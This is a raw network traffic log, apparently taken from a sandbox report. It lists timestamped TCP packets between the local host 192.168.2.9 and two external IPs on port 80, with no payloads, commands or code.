May 29, 2024 15:45:26.166512012 CEST	80	49790	45.61.137.215	192.168.2.9
May 29, 2024 15:45:26.166573048 CEST	49790	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:26.168824911 CEST	49790	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:26.173814058 CEST	80	49790	45.61.137.215	192.168.2.9
May 29, 2024 15:45:26.173861027 CEST	49790	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:26.178778887 CEST	80	49790	45.61.137.215	192.168.2.9
May 29, 2024 15:45:28.730727911 CEST	80	49790	45.61.137.215	192.168.2.9
May 29, 2024 15:45:28.730783939 CEST	80	49790	45.61.137.215	192.168.2.9
May 29, 2024 15:45:28.730834961 CEST	80	49790	45.61.137.215	192.168.2.9
May 29, 2024 15:45:28.730866909 CEST	80	49790	45.61.137.215	192.168.2.9
May 29, 2024 15:45:28.730906963 CEST	80	49790	45.61.137.215	192.168.2.9
May 29, 2024 15:45:28.730940104 CEST	80	49790	45.61.137.215	192.168.2.9
May 29, 2024 15:45:28.730977058 CEST	80	49790	45.61.137.215	192.168.2.9
May 29, 2024 15:45:28.730983019 CEST	49790	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:28.731009960 CEST	49790	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:28.731009960 CEST	49790	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:28.731048107 CEST	80	49790	45.61.137.215	192.168.2.9
May 29, 2024 15:45:28.731055975 CEST	49790	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:28.731089115 CEST	80	49790	45.61.137.215	192.168.2.9
May 29, 2024 15:45:28.731096029 CEST	49790	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:28.731123924 CEST	80	49790	45.61.137.215	192.168.2.9
May 29, 2024 15:45:28.731129885 CEST	49790	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:28.731213093 CEST	49790	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:28.731213093 CEST	49790	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:28.736124992 CEST	80	49790	45.61.137.215	192.168.2.9
May 29, 2024 15:45:28.736207962 CEST	80	49790	45.61.137.215	192.168.2.9
May 29, 2024 15:45:28.736242056 CEST	80	49790	45.61.137.215	192.168.2.9
May 29, 2024 15:45:28.736296892 CEST	49790	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:28.736342907 CEST	49790	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:28.951550961 CEST	49791	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:28.956609011 CEST	80	49791	45.61.137.215	192.168.2.9
May 29, 2024 15:45:28.957387924 CEST	49791	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:28.962608099 CEST	49791	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:28.967544079 CEST	80	49791	45.61.137.215	192.168.2.9
May 29, 2024 15:45:28.968564034 CEST	49791	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:28.973480940 CEST	80	49791	45.61.137.215	192.168.2.9
May 29, 2024 15:45:30.842744112 CEST	49792	80	192.168.2.9	101.36.116.238
May 29, 2024 15:45:30.847882986 CEST	80	49792	101.36.116.238	192.168.2.9
May 29, 2024 15:45:30.850714922 CEST	49792	80	192.168.2.9	101.36.116.238
May 29, 2024 15:45:30.851082087 CEST	49792	80	192.168.2.9	101.36.116.238
May 29, 2024 15:45:30.855942011 CEST	80	49792	101.36.116.238	192.168.2.9
May 29, 2024 15:45:31.357583046 CEST	49792	80	192.168.2.9	101.36.116.238
May 29, 2024 15:45:31.403734922 CEST	80	49792	101.36.116.238	192.168.2.9
May 29, 2024 15:45:31.591363907 CEST	80	49791	45.61.137.215	192.168.2.9
May 29, 2024 15:45:31.591384888 CEST	80	49791	45.61.137.215	192.168.2.9
May 29, 2024 15:45:31.591393948 CEST	80	49791	45.61.137.215	192.168.2.9
May 29, 2024 15:45:31.591415882 CEST	80	49791	45.61.137.215	192.168.2.9
May 29, 2024 15:45:31.591425896 CEST	80	49791	45.61.137.215	192.168.2.9
May 29, 2024 15:45:31.591455936 CEST	49791	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:31.591510057 CEST	80	49791	45.61.137.215	192.168.2.9
May 29, 2024 15:45:31.591515064 CEST	49791	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:31.591519117 CEST	80	49791	45.61.137.215	192.168.2.9
May 29, 2024 15:45:31.591530085 CEST	80	49791	45.61.137.215	192.168.2.9
May 29, 2024 15:45:31.591559887 CEST	49791	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:31.591590881 CEST	49791	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:31.591590881 CEST	49791	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:31.591747999 CEST	80	49791	45.61.137.215	192.168.2.9
May 29, 2024 15:45:31.591768026 CEST	80	49791	45.61.137.215	192.168.2.9
May 29, 2024 15:45:31.591794968 CEST	49791	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:31.591824055 CEST	49791	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:31.597043037 CEST	80	49791	45.61.137.215	192.168.2.9
May 29, 2024 15:45:31.597052097 CEST	80	49791	45.61.137.215	192.168.2.9
May 29, 2024 15:45:31.597067118 CEST	80	49791	45.61.137.215	192.168.2.9
May 29, 2024 15:45:31.597105026 CEST	49791	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:31.597135067 CEST	49791	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:31.632648945 CEST	80	49792	101.36.116.238	192.168.2.9
May 29, 2024 15:45:31.632751942 CEST	49792	80	192.168.2.9	101.36.116.238
May 29, 2024 15:45:31.794332981 CEST	49793	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:31.799344063 CEST	80	49793	45.61.137.215	192.168.2.9
May 29, 2024 15:45:31.799598932 CEST	49793	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:31.801522970 CEST	49793	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:31.806413889 CEST	80	49793	45.61.137.215	192.168.2.9
May 29, 2024 15:45:31.806539059 CEST	49793	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:31.811417103 CEST	80	49793	45.61.137.215	192.168.2.9
May 29, 2024 15:45:34.409621000 CEST	80	49793	45.61.137.215	192.168.2.9
May 29, 2024 15:45:34.409681082 CEST	80	49793	45.61.137.215	192.168.2.9
May 29, 2024 15:45:34.409718037 CEST	80	49793	45.61.137.215	192.168.2.9
May 29, 2024 15:45:34.409734964 CEST	80	49793	45.61.137.215	192.168.2.9
May 29, 2024 15:45:34.409753084 CEST	80	49793	45.61.137.215	192.168.2.9
May 29, 2024 15:45:34.409770012 CEST	80	49793	45.61.137.215	192.168.2.9
May 29, 2024 15:45:34.409769058 CEST	49793	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:34.409789085 CEST	80	49793	45.61.137.215	192.168.2.9
May 29, 2024 15:45:34.409802914 CEST	80	49793	45.61.137.215	192.168.2.9
May 29, 2024 15:45:34.409821033 CEST	80	49793	45.61.137.215	192.168.2.9
May 29, 2024 15:45:34.409838915 CEST	80	49793	45.61.137.215	192.168.2.9
May 29, 2024 15:45:34.409867048 CEST	49793	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:34.409867048 CEST	49793	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:34.409923077 CEST	49793	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:34.409923077 CEST	49793	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:34.409923077 CEST	49793	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:34.414834023 CEST	80	49793	45.61.137.215	192.168.2.9
May 29, 2024 15:45:34.414881945 CEST	80	49793	45.61.137.215	192.168.2.9
May 29, 2024 15:45:34.414921045 CEST	80	49793	45.61.137.215	192.168.2.9
May 29, 2024 15:45:34.414936066 CEST	80	49793	45.61.137.215	192.168.2.9
May 29, 2024 15:45:34.415044069 CEST	49793	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:34.415044069 CEST	49793	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:34.620651960 CEST	49794	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:34.626147985 CEST	80	49794	45.61.137.215	192.168.2.9
May 29, 2024 15:45:34.627873898 CEST	49794	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:34.630779028 CEST	49794	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:34.635899067 CEST	80	49794	45.61.137.215	192.168.2.9
May 29, 2024 15:45:34.638835907 CEST	49794	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:34.643788099 CEST	80	49794	45.61.137.215	192.168.2.9
May 29, 2024 15:45:37.199265957 CEST	80	49794	45.61.137.215	192.168.2.9
May 29, 2024 15:45:37.199301004 CEST	80	49794	45.61.137.215	192.168.2.9
May 29, 2024 15:45:37.199318886 CEST	80	49794	45.61.137.215	192.168.2.9
May 29, 2024 15:45:37.199336052 CEST	80	49794	45.61.137.215	192.168.2.9
May 29, 2024 15:45:37.199353933 CEST	80	49794	45.61.137.215	192.168.2.9
May 29, 2024 15:45:37.199383020 CEST	49794	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:37.199471951 CEST	49794	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:37.199471951 CEST	49794	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:37.199587107 CEST	80	49794	45.61.137.215	192.168.2.9
May 29, 2024 15:45:37.199604988 CEST	80	49794	45.61.137.215	192.168.2.9
May 29, 2024 15:45:37.199620962 CEST	80	49794	45.61.137.215	192.168.2.9
May 29, 2024 15:45:37.199693918 CEST	49794	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:37.199693918 CEST	49794	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:37.199695110 CEST	80	49794	45.61.137.215	192.168.2.9
May 29, 2024 15:45:37.199712038 CEST	80	49794	45.61.137.215	192.168.2.9
May 29, 2024 15:45:37.199742079 CEST	49794	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:37.199839115 CEST	49794	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:37.204313040 CEST	80	49794	45.61.137.215	192.168.2.9
May 29, 2024 15:45:37.204364061 CEST	80	49794	45.61.137.215	192.168.2.9
May 29, 2024 15:45:37.204380989 CEST	80	49794	45.61.137.215	192.168.2.9
May 29, 2024 15:45:37.204394102 CEST	49794	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:37.204422951 CEST	49794	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:37.204422951 CEST	49794	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:37.348922968 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:37.354060888 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:37.354137897 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:37.356647015 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:37.361610889 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:37.361656904 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:37.366581917 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.772905111 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.772947073 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.772979975 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.772999048 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.773014069 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.773047924 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.773057938 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.773089886 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.773102045 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.773149014 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.773178101 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.773188114 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.773214102 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.773915052 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.773946047 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.773956060 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.773977995 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.773978949 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.774017096 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.778000116 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.778043032 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.778052092 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.778086901 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.778091908 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.778120995 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.778130054 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.778153896 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.778357029 CEST	80	49795	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.778389931 CEST	49795	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.924297094 CEST	49796	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.929677010 CEST	80	49796	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.929748058 CEST	49796	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.931883097 CEST	49796	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.936798096 CEST	80	49796	45.61.137.215	192.168.2.9
May 29, 2024 15:45:39.936844110 CEST	49796	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:39.941783905 CEST	80	49796	45.61.137.215	192.168.2.9
May 29, 2024 15:45:42.445656061 CEST	80	49796	45.61.137.215	192.168.2.9
May 29, 2024 15:45:42.445684910 CEST	80	49796	45.61.137.215	192.168.2.9
May 29, 2024 15:45:42.445693970 CEST	80	49796	45.61.137.215	192.168.2.9
May 29, 2024 15:45:42.445700884 CEST	80	49796	45.61.137.215	192.168.2.9
May 29, 2024 15:45:42.445708990 CEST	80	49796	45.61.137.215	192.168.2.9
May 29, 2024 15:45:42.445718050 CEST	80	49796	45.61.137.215	192.168.2.9
May 29, 2024 15:45:42.445722103 CEST	80	49796	45.61.137.215	192.168.2.9
May 29, 2024 15:45:42.445738077 CEST	80	49796	45.61.137.215	192.168.2.9
May 29, 2024 15:45:42.445751905 CEST	49796	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:42.445755005 CEST	80	49796	45.61.137.215	192.168.2.9
May 29, 2024 15:45:42.445764065 CEST	80	49796	45.61.137.215	192.168.2.9
May 29, 2024 15:45:42.445818901 CEST	49796	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:42.445818901 CEST	49796	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:42.446546078 CEST	49796	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:42.450757980 CEST	80	49796	45.61.137.215	192.168.2.9
May 29, 2024 15:45:42.450807095 CEST	80	49796	45.61.137.215	192.168.2.9
May 29, 2024 15:45:42.450823069 CEST	80	49796	45.61.137.215	192.168.2.9
May 29, 2024 15:45:42.450995922 CEST	49796	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:42.450995922 CEST	49796	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:42.772840977 CEST	49797	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:42.778047085 CEST	80	49797	45.61.137.215	192.168.2.9
May 29, 2024 15:45:42.782718897 CEST	49797	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:42.784784079 CEST	49797	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:42.789802074 CEST	80	49797	45.61.137.215	192.168.2.9
May 29, 2024 15:45:42.790692091 CEST	49797	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:42.795602083 CEST	80	49797	45.61.137.215	192.168.2.9
May 29, 2024 15:45:45.271228075 CEST	80	49797	45.61.137.215	192.168.2.9
May 29, 2024 15:45:45.271294117 CEST	80	49797	45.61.137.215	192.168.2.9
May 29, 2024 15:45:45.271316051 CEST	80	49797	45.61.137.215	192.168.2.9
May 29, 2024 15:45:45.271332026 CEST	80	49797	45.61.137.215	192.168.2.9
May 29, 2024 15:45:45.271348953 CEST	49797	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:45.271368980 CEST	80	49797	45.61.137.215	192.168.2.9
May 29, 2024 15:45:45.271378994 CEST	49797	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:45.271384954 CEST	80	49797	45.61.137.215	192.168.2.9
May 29, 2024 15:45:45.271392107 CEST	49797	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:45.271403074 CEST	80	49797	45.61.137.215	192.168.2.9
May 29, 2024 15:45:45.271420002 CEST	80	49797	45.61.137.215	192.168.2.9
May 29, 2024 15:45:45.271435976 CEST	80	49797	45.61.137.215	192.168.2.9
May 29, 2024 15:45:45.271440983 CEST	49797	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:45.271450043 CEST	49797	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:45.271450043 CEST	49797	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:45.271454096 CEST	80	49797	45.61.137.215	192.168.2.9
May 29, 2024 15:45:45.271478891 CEST	49797	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:45.271478891 CEST	49797	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:45.271503925 CEST	49797	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:45.276473045 CEST	80	49797	45.61.137.215	192.168.2.9
May 29, 2024 15:45:45.276541948 CEST	80	49797	45.61.137.215	192.168.2.9
May 29, 2024 15:45:45.276571035 CEST	49797	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:45.276792049 CEST	80	49797	45.61.137.215	192.168.2.9
May 29, 2024 15:45:45.276810884 CEST	80	49797	45.61.137.215	192.168.2.9
May 29, 2024 15:45:45.276842117 CEST	49797	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:45.276855946 CEST	49797	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:45.276855946 CEST	49797	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:45.410608053 CEST	49798	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:45.415992022 CEST	80	49798	45.61.137.215	192.168.2.9
May 29, 2024 15:45:45.416507006 CEST	49798	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:45.418560982 CEST	49798	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:45.423597097 CEST	80	49798	45.61.137.215	192.168.2.9
May 29, 2024 15:45:45.424213886 CEST	49798	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:45.429205894 CEST	80	49798	45.61.137.215	192.168.2.9
May 29, 2024 15:45:47.941653967 CEST	80	49798	45.61.137.215	192.168.2.9
May 29, 2024 15:45:47.941711903 CEST	80	49798	45.61.137.215	192.168.2.9
May 29, 2024 15:45:47.941747904 CEST	80	49798	45.61.137.215	192.168.2.9
May 29, 2024 15:45:47.941752911 CEST	49798	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:47.941840887 CEST	49798	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:47.941873074 CEST	80	49798	45.61.137.215	192.168.2.9
May 29, 2024 15:45:47.941924095 CEST	49798	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:47.941939116 CEST	80	49798	45.61.137.215	192.168.2.9
May 29, 2024 15:45:47.941987991 CEST	80	49798	45.61.137.215	192.168.2.9
May 29, 2024 15:45:47.941991091 CEST	49798	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:47.942023039 CEST	49798	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:47.942023039 CEST	80	49798	45.61.137.215	192.168.2.9
May 29, 2024 15:45:47.942058086 CEST	80	49798	45.61.137.215	192.168.2.9
May 29, 2024 15:45:47.942071915 CEST	49798	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:47.942100048 CEST	49798	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:47.942112923 CEST	80	49798	45.61.137.215	192.168.2.9
May 29, 2024 15:45:47.942147017 CEST	80	49798	45.61.137.215	192.168.2.9
May 29, 2024 15:45:47.942158937 CEST	49798	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:47.942189932 CEST	49798	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:47.946821928 CEST	80	49798	45.61.137.215	192.168.2.9
May 29, 2024 15:45:47.946865082 CEST	49798	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:47.946888924 CEST	80	49798	45.61.137.215	192.168.2.9
May 29, 2024 15:45:47.946929932 CEST	80	49798	45.61.137.215	192.168.2.9
May 29, 2024 15:45:47.946933031 CEST	49798	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:47.946969032 CEST	49798	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:48.078788042 CEST	49799	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:48.084038973 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:48.084194899 CEST	49799	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:48.086059093 CEST	49799	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:48.090997934 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:48.091593981 CEST	49799	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:48.096535921 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.576786995 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.576813936 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.576833963 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.576847076 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.576920986 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.576939106 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.576955080 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.576966047 CEST	49799	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:50.576966047 CEST	49799	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:50.576975107 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.576988935 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.576999903 CEST	49799	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:50.576999903 CEST	49799	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:50.577378988 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.578033924 CEST	49799	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:50.578033924 CEST	49799	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:50.578033924 CEST	49799	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:50.578821898 CEST	49799	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:50.582122087 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.582165003 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.582194090 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.582221031 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.582248926 CEST	80	49799	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.582264900 CEST	49799	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:50.582264900 CEST	49799	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:50.582314968 CEST	49799	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:50.582331896 CEST	49799	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:50.748476028 CEST	49801	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:50.753477097 CEST	80	49801	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.753642082 CEST	49801	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:50.755707026 CEST	49801	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:50.760673046 CEST	80	49801	45.61.137.215	192.168.2.9
May 29, 2024 15:45:50.760795116 CEST	49801	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:50.765809059 CEST	80	49801	45.61.137.215	192.168.2.9
May 29, 2024 15:45:53.256736994 CEST	80	49801	45.61.137.215	192.168.2.9
May 29, 2024 15:45:53.256757021 CEST	80	49801	45.61.137.215	192.168.2.9
May 29, 2024 15:45:53.256851912 CEST	80	49801	45.61.137.215	192.168.2.9
May 29, 2024 15:45:53.256863117 CEST	80	49801	45.61.137.215	192.168.2.9
May 29, 2024 15:45:53.256874084 CEST	80	49801	45.61.137.215	192.168.2.9
May 29, 2024 15:45:53.256886005 CEST	80	49801	45.61.137.215	192.168.2.9
May 29, 2024 15:45:53.256901026 CEST	49801	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:53.256978989 CEST	49801	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:53.256978989 CEST	49801	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:53.257040977 CEST	80	49801	45.61.137.215	192.168.2.9
May 29, 2024 15:45:53.257054090 CEST	80	49801	45.61.137.215	192.168.2.9
May 29, 2024 15:45:53.257064104 CEST	80	49801	45.61.137.215	192.168.2.9
May 29, 2024 15:45:53.257071018 CEST	49801	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:53.257116079 CEST	49801	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:53.257116079 CEST	49801	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:53.257142067 CEST	80	49801	45.61.137.215	192.168.2.9
May 29, 2024 15:45:53.257217884 CEST	49801	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:53.261969090 CEST	80	49801	45.61.137.215	192.168.2.9
May 29, 2024 15:45:53.261981964 CEST	80	49801	45.61.137.215	192.168.2.9
May 29, 2024 15:45:53.261991978 CEST	80	49801	45.61.137.215	192.168.2.9
May 29, 2024 15:45:53.262002945 CEST	80	49801	45.61.137.215	192.168.2.9
May 29, 2024 15:45:53.262063026 CEST	49801	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:53.262063026 CEST	49801	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:53.423324108 CEST	49802	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:53.428436995 CEST	80	49802	45.61.137.215	192.168.2.9
May 29, 2024 15:45:53.428509951 CEST	49802	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:53.430974960 CEST	49802	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:53.435878038 CEST	80	49802	45.61.137.215	192.168.2.9
May 29, 2024 15:45:53.435920000 CEST	49802	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:53.440787077 CEST	80	49802	45.61.137.215	192.168.2.9
May 29, 2024 15:45:56.033720016 CEST	80	49802	45.61.137.215	192.168.2.9
May 29, 2024 15:45:56.033746004 CEST	80	49802	45.61.137.215	192.168.2.9
May 29, 2024 15:45:56.033757925 CEST	80	49802	45.61.137.215	192.168.2.9
May 29, 2024 15:45:56.033768892 CEST	80	49802	45.61.137.215	192.168.2.9
May 29, 2024 15:45:56.033780098 CEST	80	49802	45.61.137.215	192.168.2.9
May 29, 2024 15:45:56.033792019 CEST	80	49802	45.61.137.215	192.168.2.9
May 29, 2024 15:45:56.033788919 CEST	49802	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:56.033806086 CEST	80	49802	45.61.137.215	192.168.2.9
May 29, 2024 15:45:56.033816099 CEST	80	49802	45.61.137.215	192.168.2.9
May 29, 2024 15:45:56.033827066 CEST	80	49802	45.61.137.215	192.168.2.9
May 29, 2024 15:45:56.033833027 CEST	49802	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:56.033840895 CEST	80	49802	45.61.137.215	192.168.2.9
May 29, 2024 15:45:56.033849955 CEST	49802	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:56.033888102 CEST	49802	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:56.033927917 CEST	49802	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:56.038784981 CEST	80	49802	45.61.137.215	192.168.2.9
May 29, 2024 15:45:56.038796902 CEST	80	49802	45.61.137.215	192.168.2.9
May 29, 2024 15:45:56.038806915 CEST	80	49802	45.61.137.215	192.168.2.9
May 29, 2024 15:45:56.038830996 CEST	49802	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:56.038856030 CEST	49802	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:56.038892031 CEST	49802	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:56.177995920 CEST	49803	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:56.183012962 CEST	80	49803	45.61.137.215	192.168.2.9
